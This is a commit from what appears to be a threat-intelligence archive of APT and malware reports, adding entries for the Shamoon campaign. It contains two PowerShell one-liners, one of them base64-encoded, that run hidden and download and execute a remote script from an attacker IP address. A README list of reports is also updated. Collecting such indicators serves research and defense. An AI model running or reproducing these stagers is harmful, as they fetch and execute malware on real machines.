2017.02.15.the-full-shamoon

This commit is contained in:
CyberMonitor 2017-02-28 15:14:22 +08:00
parent f2c3e35ae3
commit 3bfb110042
4 changed files with 3 additions and 0 deletions

@ -0,0 +1 @@
PowerShell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(hxxp://139.59.46.154:3485/eiloShaegae1)”

@ -0,0 +1 @@
PowerShell.exe -window hidden -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQB3ACAAaABpAGQAZABlAG4AIAAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQBjACAAIgBpAGUAeAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADMAOQAuADUAOQAuADQANgAuADEANQA0ADoAMwA0ADgANQAvAGUAaQBsAG8AUwBoAGEAZQBnAGEAZQAxACcAKQAiAA==

@ -16,6 +16,7 @@ Please fire issue to me if any lost of APT/Malware events/campaigns.
* Feb 20 - [Lazarus' False Flag Malware](http://baesystemsai.blogspot.tw/2017/02/lazarus-false-flag-malware.html) | [Local](../../blob/master/2017/2017.02.20.Lazarus_False_Flag_Malware)
* Feb 17 - [ChChes - Malware that Communicates with C&C Servers Using Cookie Headers](http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html) [Local](../../blob/master/2017/2017.02.17.chches-malware)
* Feb 15 - [Deep Dive On The DragonOK Rambo Backdoor](http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor) | [Local](../../blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor)
* Feb 15 - [The Full Shamoon: How the Devastating Malware Was Inserted Into Networks](https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/) | [Local](../../blob/master/2017/2017.02.15.the-full-shamoon)
* Feb 14 - [Operation Kingphish: Uncovering a Campaign of Cyber Attacks against Civil Society in Qatar and Nepal](https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852#.cly4mg1g8) | [Local](../../blob/master/2017/2017.02.14.Operation_Kingphish)
* Feb 10 - [Enhanced Analysis of GRIZZLY STEPPE Activity](https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf) | [Local](../../blob/master/2017/2017.02.10.Enhanced_Analysis_of_GRIZZLY_STEPPE)
* Feb 02 - [Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX](https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx) | [Local](../../blob/master/2017/2017.02.02.APT_Targets_Russia_and_Belarus_with_ZeroT_and_PlugX)